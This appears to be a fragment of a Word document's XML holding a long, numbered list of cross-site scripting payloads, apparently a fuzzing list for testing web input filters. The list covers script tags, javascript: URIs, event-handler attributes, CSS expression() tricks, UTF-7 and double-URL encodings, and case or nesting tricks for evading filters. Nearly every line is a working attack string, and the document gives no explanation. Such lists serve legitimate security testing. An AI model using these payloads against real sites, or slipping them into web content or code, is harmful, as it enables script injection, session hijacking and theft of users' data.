    <w:p w14:paraId="2FA43B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&amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert(908)&amp;gt;&amp;lt;/OBJECT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8993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d=\"alert(909);\\")\";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF059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&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\"javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert(910);\"&amp;gt;&amp;#93;&amp;#93;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B0D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&amp;lt;XML ID=\"xss\"&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\"javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert(911)\"&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450EB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&amp;lt;t&amp;#58;set attributeName=\"innerHTML\" to=\"XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(912)&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D67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echo('IPT&amp;gt;alert(913)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5808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HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&amp;lt;SCRIPT&amp;gt;alert(914)&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D7A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&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert(915);+ADw-/SCRIPT+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2863E8F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SRC=\"javascript&amp;#058;alert(916)\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE03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&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(917);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503A4E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onload!#$%&amp;()*~+-_&amp;#46;,&amp;#58;;?@&amp;#91;/|\&amp;#93;^`=alert(918)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA32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SRC=\"   javascript&amp;#058;alert(919);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE5FA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'print \"&amp;lt;SCR\0IPT&amp;gt;alert(920)&amp;lt;/SCR\0IPT&amp;gt;\";' &amp;gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607ED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'print \"&amp;lt;IMG SRC=java\0script&amp;#058;alert(921)&amp;gt;\";' &amp;gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192090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SRC=\"jav&amp;#x0D;ascript&amp;#058;alert(922);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A1C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SRC=\"jav&amp;#x0A;ascript&amp;#058;alert(923);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BBCC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SRC=\"jav&amp;#x09;ascript&amp;#058;alert(924);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C59ED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SRC=javascript&amp;#058;alert(925)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096A9C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SRC=javascript&amp;#058;alert(926))&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F66BE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\"\"\"&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(927)&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9632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SRC=`javascript&amp;#058;alert(928)`&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661EC0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SRC=javascript&amp;#058;alert(929)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D01C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SRC=JaVaScRiPt&amp;#058;alert(930)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF2B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SRC=javascript&amp;#058;alert(931)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2D9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&amp;lt;IMG SRC=\"javascript&amp;#058;alert(932);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C82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';alert(933))//\';alert(933))//\";alert(933))//\\";alert(933))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(933))&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A296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';alert(934))//\';alert(934))//";alert(934))//\";alert(934))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(934))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407AC75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SRC="javascript:alert(935);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413DDDF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SRC=javascript:alert(936)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7967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SRC=javascrscriptipt:alert(937)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3596EF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SRC=JaVaScRiPt:alert(938)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7ABA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"""&gt;&lt;SCRIPT&gt;alert(939)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51436D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 &amp;#14;  javascript:alert(940);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C665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&lt;&lt;SCRIPT&gt;alert(941);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30201B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&lt;SCRIPT&gt;a=/XSS/alert(942)&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC95E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\";alert(943);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AFA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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(944);&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB4A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¼script¾alert(945)¼/script¾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B57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CONTENT="0;url=javascript:alert(946);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54447F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SRC="javascript:alert(947);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CB3A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SRC="javascript:alert(948);"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299577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BACKGROUND="javascript:alert(949)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66126B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BACKGROUND="javascript:alert(950)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE54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url(javascript:alert(951))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFCA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expression(alert(952));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B5DA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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(953)';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295467F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STYLE="xss:expr/*XSS*/ession(alert(954))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262483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&lt;XSS STYLE="xss:expression(alert(955))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4AF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exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(956))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5191F9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&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(957)&amp;lt;/SCRIPT&amp;gt;"&gt;&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6825DFF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id="test" /&gt;&lt;button form="test" formaction="javascript:alert(958)"&gt;TESTHTML5FORMACTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DAB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formaction="javascript:alert(959)"&gt;crosssitespt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E6EC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onload=alert(960)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D275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&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=alert(961)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB9E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&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=alert(962)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF45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src="javascript:alert(963)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323868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foo="&gt;&lt;script&gt;alert(964)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391478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foo="&gt;&lt;script&gt;alert(965)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B6D5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 foo="&gt;&lt;script&gt;alert(966)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714FBC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&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){alert(967)}),x&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1209D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&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(968)')()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0FF4A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src="#"&gt;{alert(969)}&lt;/script&gt;;969</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528FD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&lt;script&gt;crypto.generateCRMFRequest('CN=0',0,0,null,'alert(970)',384,null,'rsa-dual-use')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7088CA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xmlns="#"&gt;&lt;script&gt;alert(971)&lt;/script&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6F44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onload="javascript:alert(972)" xmlns="#"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96E4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xmlns="#" src="javascript:alert(973)"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB45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+ADw-script+AD4-alert(974)+ADw-/script+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B715B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%2BADw-script+AD4-alert(975)%2BADw-/script%2BAD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5C2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+ACIAPgA8-script+AD4-alert(976)+ADw-/script+AD4APAAi-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5EB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%253cscript%253ealert(977)%253c/script%253e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2689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“&gt;&lt;s”%2b”cript&gt;alert(978)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6682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“&gt;&lt;ScRiPt&gt;alert(979)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79977A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“&gt;&lt;&lt;script&gt;alert(980);//&lt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332E6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foo&lt;script&gt;alert(981)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C073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&lt;scr&lt;script&gt;ipt&gt;alert(982)&lt;/scr&lt;/script&gt;ipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0950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‘; alert(983); var foo=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C529B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foo\’; alert(984);//’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C0F0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&lt;/script&gt;&lt;script &gt;alert(985)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477901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src=asdf onerror=alert(986)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C4D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ONLOAD=alert(987)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723A5E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&lt;script&gt;alert(988)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444EDE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"&gt;&lt;script&gt;alert(989))&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366EE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src=990 onerror=alert(990)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB8C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&lt;audio src=991 onerror=alert(991)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4D8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';alert(992))//';alert(992))//";alert(992))//";alert(992))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(992))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6350C7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0\"autofocus/onfocus=alert(993)--&gt;&lt;video/poster/onerror=prompt(2)&gt;"-confirm(3)-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFDF4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SRC="javascript:alert(994);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25944D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SRC=javascript:alert(995)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572FC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SRC=JaVaScRiPt:alert(996)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B20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SRC=javascript:alert(997)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E99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SRC=`javascript:alert(998)`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55F3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onmouseover="alert(999)"&gt;xxs link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875591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onmouseover=alert(1000)&gt;xxs link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E73A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"""&gt;&lt;SCRIPT&gt;alert(1001)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEFD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SRC=javascript:alert(1002))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D5D4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SRC=# onmouseover="alert(1003)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D1D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 onmouseover="alert(1004)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4591631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onmouseover="alert(1005)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592D5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SRC=/ onerror="alert(1006))"&gt;&lt;/img&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20E3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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ascript:alert(1007);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA50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SRC="jav&amp;#x09;ascript:alert(1008);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EF3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SRC="jav&amp;#x0A;ascript:alert(1009);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17D5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SRC="jav&amp;#x0D;ascript:alert(1010);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968EF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 &amp;#14;  javascript:alert(1011);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B105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&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(1012)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072770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&lt;&lt;SCRIPT&gt;alert(1013);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17265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SRC="javascript:alert(1014)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062707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\";alert(1015);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22647E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&lt;/script&gt;&lt;script&gt;alert(1016);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467F55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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(1017);&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233AFC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SRC="javascript:alert(1018);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FA0B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BACKGROUND="javascript:alert(1019)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D4A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DYNSRC="javascript:alert(1020)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16766E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LOWSRC="javascript:alert(1021)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878BE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&lt;STYLE&gt;li {list-style-image: url("javascript:alert(1022)");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B218A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ONLOAD=alert(1023)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8997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SRC="javascript:alert(1024);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E528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SIZE="&amp;{alert(1025)}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66564D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HREF="javascript:alert(1026);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED496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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(1027)';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05267A9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STYLE="xss:expr/*XSS*/ession(alert(1028))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039E2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xss:ex/*XSS*//*/*/pression(alert(1029))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A7953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TYPE="text/javascript"&gt;alert(1030);&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331465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&lt;STYLE&gt;.XSS{background-image:url("javascript:alert(1031)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D35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type="text/css"&gt;BODY{background:url("javascript:alert(1032)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E717C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&lt;XSS STYLE="xss:expression(alert(1033))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D22F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¼script¾alert(1034)¼/script¾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048611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CONTENT="0;url=javascript:alert(1035);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266BC2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 URL=http://;URL=javascript:alert(1036);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22505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SRC="javascript:alert(1037);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327134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SRC=# onmouseover="alert(1038)"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE5FE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SRC="javascript:alert(1039);"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165692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BACKGROUND="javascript:alert(1040)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F1B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BACKGROUND="javascript:alert(1041)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69531C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url(javascript:alert(1042))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348662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url(&amp;#1;javascript:alert(1043))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279AF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expression(alert(1044));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153A5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 gte IE 4]&gt;&lt;SCRIPT&gt;alert(1045);&lt;/SCRIPT&gt;&lt;![endif]--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710AB7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HREF="javascript:alert(1046);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C60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echo('&lt;SCR)';echo('IPT&gt;alert(1047)&lt;/SCRIPT&gt;'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2C0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HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1048)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC9E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&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(1049);+ADw-/SCRIPT+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671719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0\"autofocus/onfocus=alert(1050)--&gt;&lt;video/poster/ error=prompt(2)&gt;"-confirm(3)-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D180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veris--&gt;group&lt;svg/onload=alert(1051)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FEBD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#"&gt;&lt;img src=M onerror=alert(1052);&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC6B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element[attribute='&lt;img src=x onerror=alert(1053);&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6E39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[&lt;blockquote cite="]"&gt;[" onmouseover="alert(1054);" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A86D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&lt;scr&lt;script&gt;ipt&gt;alert(1055)&lt;/scr&lt;/script&gt;ipt&gt;&lt;scr&lt;script&gt;ipt&gt;alert(1055)&lt;/scr&lt;/script&gt;ipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E7F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&lt;sCR&lt;script&gt;iPt&gt;alert(1056)&lt;/SCr&lt;/script&gt;IPt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E55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%253Cscript%253Ealert(1057)%253C%252Fscript%253E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D9E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onload="alert(1058))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E284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onafterprint="alert(1059))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4504F4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onbeforeprint="alert(1060))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2CC6E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onbeforeunload="alert(1061))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D67A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onerror="alert(1062))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B6A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onhashchange="alert(1063))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3AF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onload="alert(1064))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4558AC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onmessage="alert(1065))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF7C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ononline="alert(1066))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB81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onoffline="alert(1067))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F833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onpagehide="alert(1068))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCBB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onpageshow="alert(1069))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0116A1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onpopstate="alert(1070))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4BC8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onresize="alert(1071))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D08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onstorage="alert(1072))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608FE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onunload="alert(1073))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B1E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onblur="alert(1074))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA473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onchange="alert(1075))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F630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oncontextmenu="alert(1076))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599D4C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oninput="alert(1077))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283B0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oninvalid="alert(1078))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111FE2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onreset="alert(1079))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4430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onsearch="alert(1080))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7C6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onselect="alert(1081))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9615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onsubmit="alert(1082))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9BF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onkeydown="alert(1083))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C07F1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onkeypress="alert(1084))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7DF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onkeyup="alert(1085))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB1A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onclick="alert(1086))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D293E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ondblclick="alert(1087))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725433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onmousedown="alert(1088))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23384D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onmousemove="alert(1089))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202DD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onmouseout="alert(1090))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD3C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onmouseover="alert(1091))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F5EB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onmouseup="alert(1092))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40614E6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onmousewheel="alert(1093))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ADF9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onwheel="alert(1094))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2FEF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ondrag="alert(1095))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E9C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ondragend="alert(1096))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79911A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ondragenter="alert(1097))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8A9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ondragleave="alert(1098))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D56E0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 SRC=x ondragover="alert(1099))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E531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ondragstart="alert(1100))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB64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ondrop="alert(1101))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793611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onscroll="alert(1102))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5249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oncopy="alert(1103))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D52AF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oncut="alert(1104))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DDDF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onpaste="alert(1105))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE84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onabort="alert(1106))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BFA4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oncanplay="alert(1107))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B6B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oncanplaythrough="alert(1108))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182ED7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oncuechange="alert(1109))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58146C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ondurationchange="alert(1110))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229338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onemptied="alert(1111))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F9C3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onended="alert(1112))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD26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onerror="alert(1113))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A9A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onloadeddata="alert(1114))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D63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onloadedmetadata="alert(1115))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE900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onloadstart="alert(1116))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0D6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onpause="alert(1117))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D019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onplay="alert(1118))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B6F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onplaying="alert(1119))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB23D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onprogress="alert(1120))"&gt;</w:t>
      </w:r>
    </w:p>
